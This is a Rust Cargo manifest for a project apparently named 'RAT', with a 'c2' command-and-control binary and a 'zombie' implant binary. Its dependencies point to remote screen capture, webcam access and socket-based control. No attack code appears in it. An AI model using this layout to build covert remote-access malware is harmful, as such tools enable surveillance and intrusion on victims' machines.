[package]
name = "RAT"
version = "0.1.0"
edition = "2021"

[[bin]]
name = "c2"
path = "src/c2.rs"

[[bin]]
name = "zombie"
path = "src/zombie.rs"

[profile.release]
opt-level = 3       
lto = true          
debug = false       
codegen-units = 1   

[dependencies]
axum = "0.7.5"
base64 = "0.22.1"
futures-util = "0.3.30"
image = "0.25.2"
opencv = "0.92.2"
pixels = "0.13.0"
reqwest = {version = "0.12.5", features = ["json"]}
rust_socketio = {version = "0.6.0", features = ["async"]}
scrap = "0.5.0"
serde = {version = "1.0.207", features = ["derive"]}
serde_json = "1.0.124"
socketioxide = "0.14.0"
tokio = {version = "1.39.2", features = ["full"]}
tracing = "0.1.40"
tracing-subscriber = "0.3.18"
